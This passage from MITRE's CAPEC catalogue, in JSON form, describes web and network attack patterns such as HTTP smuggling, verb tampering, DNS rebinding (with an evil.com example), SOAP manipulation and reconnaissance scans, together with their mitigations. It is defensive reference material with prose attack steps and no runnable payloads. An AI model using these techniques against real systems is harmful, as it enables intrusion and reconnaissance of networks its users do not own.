headers.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Tools capable of monitoring HTTP messages, and crafting malicious HTTP messages and/or injecting malicious content into HTTP messages."},"Indicators":{"Indicator":"Differences in responses processed by the two agents. This requires careful monitoring or a capable log analysis tool."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.","Configuration: front-end HTTP agents notice ambiguous requests.","Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.","Configuration: Disable reuse of back-end connections.","Configuration: Use HTTP/2 for back-end connections.","Configuration: Use the same web server software for front-end and back-end server.","Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.","Configuration: Prioritize Transfer-Encoding header over Content-Length, whenever an HTTP message contains both.","Configuration: Disallow HTTP messages with both Transfer-Encoding and Content-Length or Double Content-Length Headers.","Configuration: Disallow Malformed/Invalid Transfer-Encoding Headers used in obfuscation, such as:",{"ul":{"li":["Headers with no space before the value \u201cchunked\u201d","Headers with extra spaces","Headers beginning with trailing characters","Headers providing a value \u201cchunk\u201d instead of \u201cchunked\u201d (the server normalizes this as chunked encoding)","Headers with multiple spaces before the value \u201cchunked\u201d","Headers with quoted values (whether single or double quotations)","Headers with CRLF characters before the value \u201cchunked\u201d","Values with invalid characters"]}},"Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)","Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.","Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input."]},"Example_Instances":{"Example":[{"p":"When using Undertow, a Java-based web server in Red Hat\'s Jboss Enterprise Application Platform version 7.0, the code responsible for parsing HTTP requests permitted invalid characters, that could allow the injection of data into HTTP responses from Undertow to clients when used in tandem with a proxy; allowing for web-cache poisoning, XSS, and confidentiality violation of sensitive information from other HTTP requests sent to Undertow. See also: CVE-2017-2666"},{"p":"Mozilla Firefox and Thunderbird before 1.5.04, with various proxy servers, interpreted HTTP responses differently if HTTP response headers included a space between the header name and colon or if HTTP 1.1 headers were sent through a proxy configured with HTTP 1.0, allowing for HTTP Smuggling vulnerability. See also: CVE-2006-2786"}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"436"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"27","Entry_Name":"HTTP Response Smuggling"}},"References":{"Reference":[{"External_Reference_ID":"REF-38"},{"External_Reference_ID":"REF-117"},{"External_Reference_ID":"REF-675"},{"External_Reference_ID":"REF-676"},{"External_Reference_ID":"REF-677"},{"External_Reference_ID":"REF-678"}]},"Notes":{"Note":["HTTP Splitting \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream consisting of more messages than the sender\u2019s intension. The messages sent are 100% valid and RFC compliant\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling \u2013 \\"the act of forcing a sender of (HTTP) messages to emit data stream which may be parsed as a different set of messages (i.e. dislocated message boundaries) than the sender\u2019s intention. This is done by virtue of forcing the sender to emit non-standard messages which can be interpreted in more than one way\\" [REF-117].",{"Type":"Terminology"},"HTTP Smuggling is an evolution of previous HTTP Splitting techniques which are commonly remediated against.",{"Type":"Relationship"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated @Status, Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Extended_Description, Indicators, Likelihood_Of_Attack, Mitigations, Notes, Prerequisites, References, Related_Attack_Patterns, Resources_Required, Skills_Required, Typical_Severity"}]}},"274":{"ID":"274","Name":"HTTP Verb Tampering","Abstraction":"Detailed","Status":"Draft","Description":"An attacker modifies the HTTP Verb (e.g. GET, PUT, TRACE, etc.) in order to bypass access restrictions. Some web environments allow administrators to restrict access based on the HTTP Verb used with requests. However, attackers can often provide a different HTTP Verb, or even provide a random string as a verb in order to bypass these protections. This allows the attacker to access data that should otherwise be protected.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"220","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The targeted system must attempt to filter access based on the HTTP verb used in requests."},"Resources_Required":{"Resource":"The attacker requires a tool that allows them to manually control the HTTP verb used to send messages to the targeted server."},"Mitigations":{"Mitigation":["Design: Ensure that only legitimate HTTP verbs are allowed.","Design: Do not use HTTP verbs as factors in access decisions."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"302"},{"CWE_ID":"654"}]},"References":{"Reference":{"External_Reference_ID":"REF-118"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}}},"275":{"ID":"275","Name":"DNS Rebinding","Abstraction":"Detailed","Status":"Draft","Description":"An adversary serves content whose IP address is resolved by a DNS server that the adversary controls. After initial contact by a web browser (or similar client), the adversary changes the IP address to which its name resolves, to an address within the target organization that is not publicly accessible. This allows the web browser to examine this internal address on behalf of the adversary. Web browsers enforce security zones based on DNS names in order to prevent cross-zone disclosure of information. Because the same name resolves to both these IP addresses, browsers will place both IP addresses in the same security zone and allow information to flow between the addresses. This allows adversaries to discover sensitive information about the internal network of an enterprise. If there is a trust relationship between the computer with the targeted browser and the internal machine the adversary identifies, additional attacks are possible. This attack differs from pharming attacks in that the adversary is the legitimate owner of the malicious DNS server and so does not need to compromise behavior of external DNS services.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"194","Exclude_Related":{"Exclude_ID":"403"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify potential DNS rebinding targets] An adversary publishes content on their own server with their own name and DNS server. Attract HTTP traffic and explore rebinding vulnerabilities in browsers, flash players of old version.","Technique":"Adversary uses Web advertisements to attract the victim to access adversary\'s DNS. Explore the versions of web browser or flash players in HTTP request."},{"Step":"2","Phase":"Experiment","Description":"[Establish initial target access to adversary DNS] The first time the target accesses the adversary\'s content, the adversary\'s name must be resolved to an IP address. The adversary\'s DNS server performs this resolution, providing a short Time-To-Live (TTL) in order to prevent the target from caching the value."},{"Step":"3","Phase":"Experiment","Description":"[Rebind DNS resolution to target address] The target makes a subsequent request to the adversary\'s content and the adversary\'s DNS server must again be queried, but this time the DNS server returns an address internal to the target\'s organization that would not be accessible from an outside source."},{"Step":"4","Phase":"Experiment","Description":"[Determine exploitability of DNS rebinding access to target address] The adversary can then use scripts in the content the target retrieved from the adversary in the original message to exfiltrate data from the named internal addresses."},{"Step":"5","Phase":"Exploit","Description":"[Access & exfiltrate data within the victim\'s security zone] The adversary can then use scripts in the content the target retrieved from the adversary in the original message to exfiltrate data from the internal addresses. This allows adversaries to discover sensitive information about the internal network of an enterprise.","Technique":["Adversary attempts to use victim\'s browser as an HTTP proxy to other resources inside the target\'s security zone. This allows two IP addresses placed in the same security zone.","Adversary tries to scan and access all internal hosts in victim\'s local network by sending multiple short-lived IP addresses."]}]},"Prerequisites":{"Prerequisite":"The target browser must access content server from the adversary controlled DNS name. Web advertisements are often used for this purpose. The target browser must honor the TTL value returned by the adversary and re-resolve the adversary\'s DNS name after initial contact."},"Skills_Required":{"Skill":["Setup DNS server and the adversary\'s web server. Write a malicious script to allow the victim to connect to the web server.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The adversary must serve some web content that a victim accesses initially. This content must include executable content that queries the adversary\'s DNS name (to provide the second DNS resolution) and then performs the follow-on attack against the internal system. The adversary also requires a customized DNS server that serves an IP address for their registered DNS name, but which resolves subsequent requests by a single client to addresses internal to that client\'s network."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"}]},"Mitigations":{"Mitigation":["Design: IP Pinning causes browsers to record the IP address to which a given name resolves and continue using this address regardless of the TTL set in the DNS response. Unfortunately, this is incompatible with the design of some legitimate sites.","Implementation: Reject HTTP request with a malicious Host header.","Implementation: Employ DNS resolvers that prevent external names from resolving to internal addresses."]},"Example_Instances":{"Example":"The adversary registers a domain name, such as www.evil.com with IP address 1.3.5.7, delegates it to their own DNS server (1.3.5.2), and uses phishing links or emails to get HTTP traffic. Instead of sending a normal TTL record, the DNS server sends a very short TTL record (for example, 1 second), preventing DNS response of entry[www.evil.com, 1.3.5.7] from being cached on victim\'s (192.168.1.10) browser. The adversary\'s server first responds to the victim with malicious script such as JavaScript, containing IP address (1.3.5.7) of the server. The adversary uses XMLHttpRequest (XHR) to send HTTP request or HTTPS request directly to the adversary\'s server and load response. The malicious script allows the adversary to rebind the host name to the IP address (192.168.1.2) of a target server that is behind the firewall. Then the server responds to the adversary\'s real target, which is an internal host IP (192.168.1.2) in the same domain of the victim (192.168.1.10). Because the same name resolves to both these IP addresses, browsers will place both IP addresses (1.3.5.7 and 192.168.1.2) in the same security zone and allow information to flow between the addresses. Further, the adversary can achieve scanning and accessing all internal hosts in the victim\'s local network (192.168.X.X) by sending multiple short-lived IP addresses."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"350"}},"References":{"Reference":[{"External_Reference_ID":"REF-119"},{"External_Reference_ID":"REF-120","Section":"DNS rebinding"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Payload, Related_Attack_Patterns, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description"}]}},"276":{"ID":"276","Name":"Inter-component Protocol Manipulation","Abstraction":"Standard","Status":"Draft","Description":"Inter-component protocols are used to communicate between different software and hardware modules within a single computer. Common examples are: interrupt signals and data pipes. Subverting the protocol can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"272"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"707"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary, Related_Weaknesses"}}},"277":{"ID":"277","Name":"Data Interchange Protocol Manipulation","Abstraction":"Standard","Status":"Draft","Description":"Data Interchange Protocols are used to transmit structured data between entities. These protocols are often specific to a particular domain (B2B: purchase orders, invoices, transport logistics and waybills, medical records). They are often, but not always, XML-based. Subverting the protocol can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"272"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"707"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"278":{"ID":"278","Name":"Web Services Protocol Manipulation","Abstraction":"Standard","Status":"Draft","Description":"An adversary manipulates a web service related protocol to cause a web application or service to react differently than intended. This can either be performed through the manipulation of call parameters to include unexpected values, or by changing the called function to one that should normally be restricted or limited. By leveraging this pattern of attack, the adversary is able to gain access to data or resources normally restricted, or to cause the application or service to crash.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"272"}},"Prerequisites":{"Prerequisite":"The targeted application or service must rely on web service protocols in such a way that malicious manipulation of them can alter functionality."},"Resources_Required":{"Resource":"The attacker must be able to manipulate the communications to the targeted application or service."},"Mitigations":{"Mitigation":["Design: Range, size and value and consistency verification for any arguments supplied to applications and services from external sources and devise appropriate error response.","Design: Ensure that function calls that should not be called by an unprivileged user are not accessible to them."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"707"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"279":{"ID":"279","Name":"SOAP Manipulation","Abstraction":"Detailed","Status":"Draft","Description":"Simple Object Access Protocol (SOAP) is used as a communication protocol between a client and server to invoke web services on the server. It is an XML-based protocol, and therefore suffers from many of the same shortcomings as other XML-based protocols. Adversaries can make use of these shortcomings and manipulate the content of SOAP paramters, leading to undesirable behavior on the server and allowing the adversary to carry out a number of further attacks.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"278"},{"Nature":"CanPrecede","CAPEC_ID":"110"},{"Nature":"CanPrecede","CAPEC_ID":"228"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Exploit","Description":"[Find target application] The adversary needs to identify an application that uses SOAP as a communication protocol.","Technique":"Observe HTTP traffic to an application and look for SOAP headers."},{"Step":"2","Phase":"Experiment","Description":"[Detect Incorrect SOAP Parameter Handling] The adversary tampers with the SOAP message parameters and looks for indications that the tampering caused a change in behavior of the targeted application.","Technique":["Send more data than would seem reasonable for a field and see if the server complains.","Send nonsense data in a field that expects a certain subset, such as product names or sequence numbers, and see if the server complains.","Send XML metacharacters as data and see how the server responds."]},{"Step":"3","Phase":"Exploit","Description":"[Manipulate SOAP parameters] The adversary manipulates SOAP parameters in a way that causes undesirable behavior for the server. This can result in denial of service, information disclosure, arbitrary code exection, and more.","Technique":["Create a recursive XML payload that will take up all of the memory on the server when parsed, resulting in a denial of service. This is known as the billion laughs attack.","Insert XML metacharacters into data fields that could cause the server to go into an error state when parsing. This could lead to a denial of service.","Insert a large amount of data into a field that should have a character limit, causing a buffer overflow."]}]},"Prerequisites":{"Prerequisite":["An application uses SOAP-based web service api.","An application does not perform sufficient input validation to ensure that user-controllable data is safe for an XML parser.","The targeted server either fails to verify that data in SOAP messages conforms to the appropriate XML schema, or it fails to correctly handle the complete range of data allowed by the schema."]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"707"}},"References":{"Reference":{"External_Reference_ID":"REF-121"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description, Description Summary, Examples-Instances, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow"}],"Previous_Entry_Name":["Soap Manipulation",{"Date":"2018-07-31"}]}},"285":{"ID":"285","Name":"ICMP Echo Request Ping","Abstraction":"Detailed","Status":"Stable","Description":"An adversary sends out an ICMP Type 8 Echo Request, commonly known as a \'Ping\', in order to determine if a target system is responsive. If the request is not blocked by a firewall or ACL, the target host will respond with an ICMP Type 0 Echo Reply datagram. This type of exchange is usually referred to as a \'Ping\' due to the Ping utility present in almost all operating systems. Ping, as commonly implemented, allows a user to test for alive hosts, measure round-trip time, and measure the percentage of packet loss. Performing this operation for a range of hosts on the network is known as a \'Ping Sweep\'. While the Ping utility is useful for small-scale host discovery, it was not designed for rapid or efficient host discovery over large network blocks. Other scanning utilities have been created that make ICMP ping sweeps easier to perform. Most networks filter ingress ICMP Type 8 messages for security reasons. Various other methods of performing ping sweeps have developed as a result. It is important to recognize the key security goal of the adversary is to discover if an IP address is alive, or has a responsive host. To this end, virtually any type of ICMP message, as defined by RFC 792 is useful. An adversary can cycle through various types of ICMP messages to determine if holes exist in the firewall configuration. When ICMP ping sweeps fail to discover hosts, other protocols can be used for the same purpose, such as TCP SYN or ACK segments, UDP datagrams sent to closed ports, etc.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":"The ability to send an ICMP type 8 query (Echo Request) to a remote target and receive an ICMP type 0 message (ICMP Echo Reply) in response. Any firewalls or access control lists between the sender and receiver must allow ICMP Type 8 and ICMP Type 0 messages in order for a ping operation to succeed."},"Skills_Required":{"Skill":["The adversary needs to know certain linux commands for this type of attack.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Scanners or utilities that provide the ability to send custom ICMP queries."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"A successful attack of this kind can identify open ports and available services on a system."}},"Mitigations":{"Mitigation":"Consider configuring firewall rules to block ICMP Echo requests and prevent replies. If not practical, monitor and consider action when a system has fast and a repeated pattern of requests that move incrementally through port numbers."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 44-51"},{"External_Reference_ID":"REF-123"},{"External_Reference_ID":"REF-124"},{"External_Reference_ID":"REF-125"},{"External_Reference_ID":"REF-34","Section":"Section 3.5.2 Ping Scan (-SP), pg. 58"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required, Description, Description Summary, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"287":{"ID":"287","Name":"TCP SYN Scan","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a SYN scan to determine the status of ports on the remote target. SYN scanning is the most common type of port scanning that is used because of its many advantages and few drawbacks. As a result, novice attackers tend to overly rely on the SYN scan while performing system reconnaissance. As a scanning method, the primary advantages of SYN scanning are its universality and speed. RFC 793 defines the required behavior of any TCP/IP device in that an incoming connection request begins with a SYN packet, which in turn must be followed by a SYN/ACK packet from the receiving service. For this reason, like TCP Connect scanning, SYN scanning works against any TCP stack. Unlike TCP Connect scanning, it is possible to scan thousands of ports per second using this method. This type of scanning is usually referred to as \'half-open\' scanning because it does not complete the three-way handshake. The scanning rate is extremely fast because no time is wasted completing the handshake or tearing down the connection. This technique allows an attacker to scan through stateful firewalls due to the common configuration that TCP SYN segments for a new connection will be allowed for almost any port. TCP SYN scanning can also immediately detect 3 of the 4 important types of port status: open, closed, and filtered.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"300"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An adversary sends SYN packets to ports they want to scan and checks the response without completing the TCP handshake."},{"Step":"2","Phase":"Experiment","Description":"An adversary uses the response from the target to determine the port\'s state. The adversary can determine the state of a port based on the following responses. When a SYN is sent to an open port and unfiltered port, a SYN/ACK will be generated. When a SYN packet is sent to a closed port a RST is generated, indicating the port is closed. When SYN scanning to a particular port generates no response, or when the request triggers ICMP Type 3 unreachable errors, the port is filtered."}]},"Prerequisites":{"Prerequisite":"This scan type is not possible with some operating systems (Windows XP SP 2). On Linux and Unix systems it requires root privileges to use raw sockets."},"Resources_Required":{"Resource":"The ability to send TCP SYN segments to a host during network reconnaissance via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other","Note":"A successful attack of this kind can identify open ports and available services on a system."},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pg. 56"},{"External_Reference_ID":"REF-128"},{"External_Reference_ID":"REF-34","Section":"Section 5.32 TCP SYN (Stealth) Scan, pg. 100"},{"External_Reference_ID":"REF-130"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Description, Description Summary, References, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Execution_Flow"}]}},"290":{"ID":"290","Name":"Enumerate Mail Exchange (MX) Records","Abstraction":"Detailed","Status":"Stable","Description":"An adversary enumerates the MX records for a given via a DNS query. This type of information gathering returns the names of mail servers on the network. Mail servers are often not exposed to the Internet but are located within the DMZ of a network protected by a firewall. A side effect of this configuration is that enumerating the MX records for an organization my reveal the IP address of the firewall or possibly other internal systems. Attackers often resort to MX record enumeration when a DNS Zone Transfer is not possible.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"309"}},"Prerequisites":{"Prerequisite":"The adversary requires access to a DNS server that will return the MX records for a network."},"Resources_Required":{"Resource":"A command-line utility or other application capable of sending requests to the DNS server is necessary."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 38"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Related_Weaknesses"}}},"291":{"ID":"291","Name":"DNS Zone Transfers","Abstraction":"Detailed","Status":"Stable","Description":"An attacker exploits a DNS misconfiguration that permits a ZONE transfer. Some external DNS servers will return a list of IP address and valid hostnames. Under certain conditions, it may even be possible to obtain Zone data about the organization\'s internal network. When successful the attacker learns valuable information about the topology of the target organization, including information about particular servers, their role within the IT structure, and possibly information about the operating systems running upon the network. This is configuration dependent behavior so it may also be required to search out multiple DNS servers while attempting to find one with ZONE transfers allowed.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"309"}},"Prerequisites":{"Prerequisite":"Access to a DNS server that allows Zone transfers."},"Resources_Required":{"Resource":"A client application capable of interacting with the DNS server or a command-line utility or web application that automates DNS interactions."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"References":{"Reference":{"External_Reference_ID":"REF-33","Section":"Chapter 2: Scanning, pp. 34"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Weaknesses"}}},"292":{"ID":"292","Name":"Host Discovery","Abstraction":"Standard","Status":"Stable","Description":"An adversary sends a probe to an IP address to determine if the host is alive. Host discovery is one of the earliest phases of network reconnaissance. The adversary usually starts with a range of IP addresses belonging to a target network and uses various methods to determine if a host is present at that IP address. Host discovery is usually referred to as \'Ping\' scanning using a sonar analogy. The goal is to send a packet through to the IP address and solicit a response from the host. As such, a \'ping\' can be virtually any crafted packet whatsoever, provided the adversary can identify a functional host based on its response. An attack of this nature is usually carried out with a \'ping sweep,\' where a particular kind of ping is sent to a range of IP addresses.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"169"}},"Prerequisites":{"Prerequisite":"The adversary requires logical access to the target network in order to carry out host discovery."},"Resources_Required":{"Resource":"The resources required will differ based upon the type of host discovery being performed. Usually a network scanning tool or scanning script is required due to the volume of requests that must be generated."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Hide Activities"]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"200"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1018","Entry_Name":"Remote System Discovery"}},"References":{"Reference":[{"External_Reference_ID":"REF-33","Section":"Chapter 1: Footprinting, pp.44"},{"External_Reference_ID":"REF-34","Section":"Section 3.6 Host Discover Techniques, pg.57"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC 